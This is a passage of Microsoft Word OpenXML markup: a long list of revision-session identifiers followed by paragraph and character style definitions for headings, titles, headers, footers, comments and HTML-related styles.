    <w:rsid w:val="00450BD6"/>
    <w:rsid w:val="00460908"/>
    <w:rsid w:val="004642A1"/>
    <w:rsid w:val="004720AB"/>
    <w:rsid w:val="00482EE7"/>
    <w:rsid w:val="00487FCA"/>
    <w:rsid w:val="00492993"/>
    <w:rsid w:val="00494210"/>
    <w:rsid w:val="00494CEA"/>
    <w:rsid w:val="004A02ED"/>
    <w:rsid w:val="004A133F"/>
    <w:rsid w:val="004A7880"/>
    <w:rsid w:val="004A7CF0"/>
    <w:rsid w:val="004B1AEF"/>
    <w:rsid w:val="004B5BB5"/>
    <w:rsid w:val="004B6BC2"/>
    <w:rsid w:val="004B744F"/>
    <w:rsid w:val="004C03A9"/>
    <w:rsid w:val="004C09E4"/>
    <w:rsid w:val="004C3174"/>
    <w:rsid w:val="004C3642"/>
    <w:rsid w:val="004C4A1D"/>
    <w:rsid w:val="004C5E4F"/>
    <w:rsid w:val="004D400C"/>
    <w:rsid w:val="004D5C4F"/>
    <w:rsid w:val="004E2928"/>
    <w:rsid w:val="00505392"/>
    <w:rsid w:val="00505B0A"/>
    <w:rsid w:val="00523B70"/>
    <w:rsid w:val="005261C7"/>
    <w:rsid w:val="005319D5"/>
    <w:rsid w:val="0054300A"/>
    <w:rsid w:val="005536E2"/>
    <w:rsid w:val="005563F0"/>
    <w:rsid w:val="00557C0A"/>
    <w:rsid w:val="005647AB"/>
    <w:rsid w:val="005720A5"/>
    <w:rsid w:val="005758DA"/>
    <w:rsid w:val="00587B5E"/>
    <w:rsid w:val="005A359D"/>
    <w:rsid w:val="005A6A59"/>
    <w:rsid w:val="005B2718"/>
    <w:rsid w:val="005B369F"/>
    <w:rsid w:val="005C2C76"/>
    <w:rsid w:val="005C3C44"/>
    <w:rsid w:val="005C3C79"/>
    <w:rsid w:val="005C7DD4"/>
    <w:rsid w:val="005E4BBE"/>
    <w:rsid w:val="005F3986"/>
    <w:rsid w:val="005F3BF2"/>
    <w:rsid w:val="005F49DB"/>
    <w:rsid w:val="005F7962"/>
    <w:rsid w:val="0060040E"/>
    <w:rsid w:val="00600F87"/>
    <w:rsid w:val="006015E1"/>
    <w:rsid w:val="006067C5"/>
    <w:rsid w:val="00611E23"/>
    <w:rsid w:val="00613335"/>
    <w:rsid w:val="00622D11"/>
    <w:rsid w:val="0062648F"/>
    <w:rsid w:val="0064046F"/>
    <w:rsid w:val="00650ED1"/>
    <w:rsid w:val="006528A4"/>
    <w:rsid w:val="006545D1"/>
    <w:rsid w:val="00660900"/>
    <w:rsid w:val="00660D94"/>
    <w:rsid w:val="00662BC5"/>
    <w:rsid w:val="00662D05"/>
    <w:rsid w:val="0066433F"/>
    <w:rsid w:val="0068314B"/>
    <w:rsid w:val="006845B2"/>
    <w:rsid w:val="0069205D"/>
    <w:rsid w:val="006A5287"/>
    <w:rsid w:val="006A5D68"/>
    <w:rsid w:val="006B6BEC"/>
    <w:rsid w:val="006C0B06"/>
    <w:rsid w:val="006C600B"/>
    <w:rsid w:val="006C760E"/>
    <w:rsid w:val="006D7B4B"/>
    <w:rsid w:val="006E364F"/>
    <w:rsid w:val="006E5326"/>
    <w:rsid w:val="006E7D01"/>
    <w:rsid w:val="006E7E1C"/>
    <w:rsid w:val="006F407F"/>
    <w:rsid w:val="00704C9B"/>
    <w:rsid w:val="00704F63"/>
    <w:rsid w:val="0070587D"/>
    <w:rsid w:val="007065B4"/>
    <w:rsid w:val="00724ADD"/>
    <w:rsid w:val="00740B62"/>
    <w:rsid w:val="00780B13"/>
    <w:rsid w:val="007818E6"/>
    <w:rsid w:val="0079023E"/>
    <w:rsid w:val="007A0A91"/>
    <w:rsid w:val="007A1CB3"/>
    <w:rsid w:val="007A33A7"/>
    <w:rsid w:val="007A7773"/>
    <w:rsid w:val="007B0D65"/>
    <w:rsid w:val="007B4A2B"/>
    <w:rsid w:val="007C44FA"/>
    <w:rsid w:val="007C5776"/>
    <w:rsid w:val="007C5A79"/>
    <w:rsid w:val="007D0004"/>
    <w:rsid w:val="007D2F44"/>
    <w:rsid w:val="007D6BC6"/>
    <w:rsid w:val="007F30D6"/>
    <w:rsid w:val="007F69A0"/>
    <w:rsid w:val="007F6A37"/>
    <w:rsid w:val="00807DCA"/>
    <w:rsid w:val="00826478"/>
    <w:rsid w:val="0084643E"/>
    <w:rsid w:val="00852DD0"/>
    <w:rsid w:val="0086110C"/>
    <w:rsid w:val="00866C89"/>
    <w:rsid w:val="00871A89"/>
    <w:rsid w:val="008739A8"/>
    <w:rsid w:val="008829B5"/>
    <w:rsid w:val="00885822"/>
    <w:rsid w:val="0089134D"/>
    <w:rsid w:val="008B1608"/>
    <w:rsid w:val="008B6BB1"/>
    <w:rsid w:val="008D27BA"/>
    <w:rsid w:val="008D313B"/>
    <w:rsid w:val="008E7AA5"/>
    <w:rsid w:val="0090289E"/>
    <w:rsid w:val="00902C29"/>
    <w:rsid w:val="0091088A"/>
    <w:rsid w:val="00910C35"/>
    <w:rsid w:val="00915229"/>
    <w:rsid w:val="00916C56"/>
    <w:rsid w:val="009216F4"/>
    <w:rsid w:val="00923ACF"/>
    <w:rsid w:val="00924609"/>
    <w:rsid w:val="0092710C"/>
    <w:rsid w:val="0093072B"/>
    <w:rsid w:val="00934ECF"/>
    <w:rsid w:val="009453CD"/>
    <w:rsid w:val="00946AFB"/>
    <w:rsid w:val="00947762"/>
    <w:rsid w:val="00947889"/>
    <w:rsid w:val="00957099"/>
    <w:rsid w:val="00962F94"/>
    <w:rsid w:val="0096587F"/>
    <w:rsid w:val="00967220"/>
    <w:rsid w:val="009716F4"/>
    <w:rsid w:val="00972712"/>
    <w:rsid w:val="00974ED3"/>
    <w:rsid w:val="009762B2"/>
    <w:rsid w:val="00977EBD"/>
    <w:rsid w:val="00982D08"/>
    <w:rsid w:val="009840AB"/>
    <w:rsid w:val="00986592"/>
    <w:rsid w:val="009868F2"/>
    <w:rsid w:val="009949F6"/>
    <w:rsid w:val="00994D2B"/>
    <w:rsid w:val="00995839"/>
    <w:rsid w:val="00996F01"/>
    <w:rsid w:val="009B32A7"/>
    <w:rsid w:val="009B7348"/>
    <w:rsid w:val="009E3CE3"/>
    <w:rsid w:val="009E4C18"/>
    <w:rsid w:val="009E60D3"/>
    <w:rsid w:val="009F237B"/>
    <w:rsid w:val="00A121C5"/>
    <w:rsid w:val="00A126C7"/>
    <w:rsid w:val="00A218D6"/>
    <w:rsid w:val="00A22AB3"/>
    <w:rsid w:val="00A31A4C"/>
    <w:rsid w:val="00A4264A"/>
    <w:rsid w:val="00A43F2E"/>
    <w:rsid w:val="00A503DD"/>
    <w:rsid w:val="00A540DB"/>
    <w:rsid w:val="00A542BD"/>
    <w:rsid w:val="00A5497B"/>
    <w:rsid w:val="00A55ED6"/>
    <w:rsid w:val="00A60271"/>
    <w:rsid w:val="00A61EAE"/>
    <w:rsid w:val="00A66685"/>
    <w:rsid w:val="00A70DD4"/>
    <w:rsid w:val="00A76640"/>
    <w:rsid w:val="00A840F0"/>
    <w:rsid w:val="00A904F3"/>
    <w:rsid w:val="00A92637"/>
    <w:rsid w:val="00A97E18"/>
    <w:rsid w:val="00AA4F5D"/>
    <w:rsid w:val="00AB7921"/>
    <w:rsid w:val="00AC063D"/>
    <w:rsid w:val="00AC08B3"/>
    <w:rsid w:val="00AD2AC8"/>
    <w:rsid w:val="00AD3E35"/>
    <w:rsid w:val="00AD5010"/>
    <w:rsid w:val="00AD5897"/>
    <w:rsid w:val="00AD5BBD"/>
    <w:rsid w:val="00AD6226"/>
    <w:rsid w:val="00AE3DB7"/>
    <w:rsid w:val="00AE7D7C"/>
    <w:rsid w:val="00AF153E"/>
    <w:rsid w:val="00AF276C"/>
    <w:rsid w:val="00AF32B1"/>
    <w:rsid w:val="00AF4FAF"/>
    <w:rsid w:val="00AF5653"/>
    <w:rsid w:val="00B06BE3"/>
    <w:rsid w:val="00B071B5"/>
    <w:rsid w:val="00B07502"/>
    <w:rsid w:val="00B139E5"/>
    <w:rsid w:val="00B14882"/>
    <w:rsid w:val="00B16A5F"/>
    <w:rsid w:val="00B2367D"/>
    <w:rsid w:val="00B23ED0"/>
    <w:rsid w:val="00B24A63"/>
    <w:rsid w:val="00B35D0A"/>
    <w:rsid w:val="00B3678C"/>
    <w:rsid w:val="00B4694B"/>
    <w:rsid w:val="00B4758E"/>
    <w:rsid w:val="00B55376"/>
    <w:rsid w:val="00B61FC5"/>
    <w:rsid w:val="00B63678"/>
    <w:rsid w:val="00B714FD"/>
    <w:rsid w:val="00B72123"/>
    <w:rsid w:val="00B73AC1"/>
    <w:rsid w:val="00B74E36"/>
    <w:rsid w:val="00B9114D"/>
    <w:rsid w:val="00B937DF"/>
    <w:rsid w:val="00B948F7"/>
    <w:rsid w:val="00BA705E"/>
    <w:rsid w:val="00BB5126"/>
    <w:rsid w:val="00BC430F"/>
    <w:rsid w:val="00BC6934"/>
    <w:rsid w:val="00BD281E"/>
    <w:rsid w:val="00BD41D0"/>
    <w:rsid w:val="00BD67FF"/>
    <w:rsid w:val="00BE66E0"/>
    <w:rsid w:val="00BF7E5A"/>
    <w:rsid w:val="00C03241"/>
    <w:rsid w:val="00C1071B"/>
    <w:rsid w:val="00C16E3E"/>
    <w:rsid w:val="00C170DA"/>
    <w:rsid w:val="00C2152D"/>
    <w:rsid w:val="00C23395"/>
    <w:rsid w:val="00C2577D"/>
    <w:rsid w:val="00C3368C"/>
    <w:rsid w:val="00C3445B"/>
    <w:rsid w:val="00C40226"/>
    <w:rsid w:val="00C47C98"/>
    <w:rsid w:val="00C500EA"/>
    <w:rsid w:val="00C53410"/>
    <w:rsid w:val="00C631CE"/>
    <w:rsid w:val="00C83A6C"/>
    <w:rsid w:val="00C84B63"/>
    <w:rsid w:val="00C862B1"/>
    <w:rsid w:val="00CA2C16"/>
    <w:rsid w:val="00CA7203"/>
    <w:rsid w:val="00CB45D8"/>
    <w:rsid w:val="00CB6707"/>
    <w:rsid w:val="00CC638D"/>
    <w:rsid w:val="00CD0661"/>
    <w:rsid w:val="00CD6D12"/>
    <w:rsid w:val="00CE0389"/>
    <w:rsid w:val="00CE71E8"/>
    <w:rsid w:val="00CE729C"/>
    <w:rsid w:val="00CF38EC"/>
    <w:rsid w:val="00CF669E"/>
    <w:rsid w:val="00D04DDD"/>
    <w:rsid w:val="00D07308"/>
    <w:rsid w:val="00D109D3"/>
    <w:rsid w:val="00D2351C"/>
    <w:rsid w:val="00D238BF"/>
    <w:rsid w:val="00D2461E"/>
    <w:rsid w:val="00D27830"/>
    <w:rsid w:val="00D31D61"/>
    <w:rsid w:val="00D33A85"/>
    <w:rsid w:val="00D37D15"/>
    <w:rsid w:val="00D55B9E"/>
    <w:rsid w:val="00D65264"/>
    <w:rsid w:val="00D80016"/>
    <w:rsid w:val="00D873DF"/>
    <w:rsid w:val="00D91258"/>
    <w:rsid w:val="00D91B3F"/>
    <w:rsid w:val="00D92D0F"/>
    <w:rsid w:val="00DC78F5"/>
    <w:rsid w:val="00DD2EAE"/>
    <w:rsid w:val="00DD3A2D"/>
    <w:rsid w:val="00DE4D6E"/>
    <w:rsid w:val="00DF695C"/>
    <w:rsid w:val="00E06E4D"/>
    <w:rsid w:val="00E163F5"/>
    <w:rsid w:val="00E300FD"/>
    <w:rsid w:val="00E44D34"/>
    <w:rsid w:val="00E47D91"/>
    <w:rsid w:val="00E54546"/>
    <w:rsid w:val="00E6376C"/>
    <w:rsid w:val="00E7077D"/>
    <w:rsid w:val="00E8084D"/>
    <w:rsid w:val="00E82F11"/>
    <w:rsid w:val="00EA4B2D"/>
    <w:rsid w:val="00EA5596"/>
    <w:rsid w:val="00EC44E5"/>
    <w:rsid w:val="00EC4F14"/>
    <w:rsid w:val="00ED2788"/>
    <w:rsid w:val="00EE3D9E"/>
    <w:rsid w:val="00EE7C5B"/>
    <w:rsid w:val="00EF732B"/>
    <w:rsid w:val="00F26110"/>
    <w:rsid w:val="00F26E89"/>
    <w:rsid w:val="00F274F7"/>
    <w:rsid w:val="00F36B40"/>
    <w:rsid w:val="00F40401"/>
    <w:rsid w:val="00F40BAE"/>
    <w:rsid w:val="00F433D5"/>
    <w:rsid w:val="00F52A7B"/>
    <w:rsid w:val="00F54E75"/>
    <w:rsid w:val="00F6228A"/>
    <w:rsid w:val="00F6591D"/>
    <w:rsid w:val="00F67D27"/>
    <w:rsid w:val="00F90858"/>
    <w:rsid w:val="00FA4A86"/>
    <w:rsid w:val="00FB1D99"/>
    <w:rsid w:val="00FB3247"/>
    <w:rsid w:val="00FC1F48"/>
    <w:rsid w:val="00FD0891"/>
    <w:rsid w:val="00FD74A4"/>
    <w:rsid w:val="00FE2272"/>
    <w:rsid w:val="00FF0DF0"/>
    <w:rsid w:val="0BB29CC7"/>
    <w:rsid w:val="6A5E135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C636FA"/>
  <w15:docId w15:val="{EF869135-5285-4891-A658-26291A9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4B"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI Light" w:hAnsi="Segoe UI Light"/>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="0039200D"/>
    <w:pPr>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI Semibold" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Semibold" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="34"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="006545D1"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="360"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI Semibold" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Semibold" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="425160"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="000603D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843"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="003B7843"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00916C56"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="11"/>
      <w:szCs w:val="11"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00916C56"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI Light" w:hAnsi="Segoe UI Light"/>
      <w:sz w:val="11"/>
      <w:szCs w:val="11"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003B7843"/>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3B7843"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:aliases w:val="Main Title"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="009840AB"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:sz w:val="60"/>
      <w:szCs w:val="60"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
    <w:aliases w:val="Main Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="009840AB"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:sz w:val="60"/>
      <w:szCs w:val="60"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:aliases w:val="for Main/Section Titles"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="SubtitleChar"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="00F52A7B"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
      <w:spacing w:after="160"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:color w:val="425160"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SubtitleChar">
    <w:name w:val="Subtitle Char"/>
    <w:aliases w:val="for Main/Section Titles Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Subtitle"/>
    <w:uiPriority w:val="11"/>
    <w:rsid w:val="00F52A7B"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI Light" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Segoe UI Light"/>
      <w:color w:val="425160"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="LargeText">
    <w:name w:val="Large Text"/>
    <w:qFormat/>
    <w:rsid w:val="0066433F"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI Light" w:hAnsi="Segoe UI Light"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="0039200D"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI Semibold" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Semibold" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="34"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Date">
    <w:name w:val="Date"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="DateChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009840AB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="DateChar">
    <w:name w:val="Date Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Date"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="009840AB"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI Light" w:hAnsi="Segoe UI Light"/>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009840AB"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentTextChar">
    <w:name w:val="Comment Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CommentText"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="009840AB"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI Light" w:hAnsi="Segoe UI Light"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="E-mailSignature">
    <w:name w:val="E-mail Signature"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="E-mailSignatureChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009840AB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="E-mailSignatureChar">
    <w:name w:val="E-mail Signature Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="E-mailSignature"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="009840AB"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI Light" w:hAnsi="Segoe UI Light"/>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="EndnoteReference">
    <w:name w:val="endnote reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009840AB"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="EnvelopeReturn">
    <w:name w:val="envelope return"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009840AB"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FootnoteReference">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009840AB"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLAcronym">
    <w:name w:val="HTML Acronym"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009840AB"/>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCite">
    <w:name w:val="HTML Cite"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009840AB"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009840AB"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLKeyboard">
    <w:name w:val="HTML Keyboard"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009840AB"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLDefinition">
    <w:name w:val="HTML Definition"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009840AB"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index6">
    <w:name w:val="index 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009840AB"/>
    <w:pPr>
      <w:ind w:left="1080" w:hanging="180"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index5">
    <w:name w:val="index 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009840AB"/>
    <w:pPr>
      <w:ind w:left="900" w:hanging="180"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index4">
    <w:name w:val="index 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009840AB"/>
    <w:pPr>
      <w:ind w:left="720" w:hanging="180"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index3">
    <w:name w:val="index 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009840AB"/>
    <w:pPr>
      <w:ind w:left="540" w:hanging="180"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="PageNumber">
    <w:name w:val="page number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009840AB"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoteHeading">
    <w:name w:val="Note Heading"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="NoteHeadingChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009840AB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="NoteHeadingChar">
    <w:name w:val="Note Heading Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="NoteHeading"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="009840AB"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI Light" w:hAnsi="Segoe UI Light"/>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalIndent">
    <w:name w:val="Normal Indent"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009840AB"/>
    <w:pPr>
      <w:ind w:left="720"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009840AB"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Mention">
    <w:name w:val="Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009840AB"/>
    <w:rPr>
      <w:color w:val="2B579A"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="MacroText">
    <w:name w:val="macro"/>
    <w:link w:val="MacroTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009840AB"/>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rsid w:val="009840AB"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListNumber5">
    <w:name w:val="List Number 5"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009840AB"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
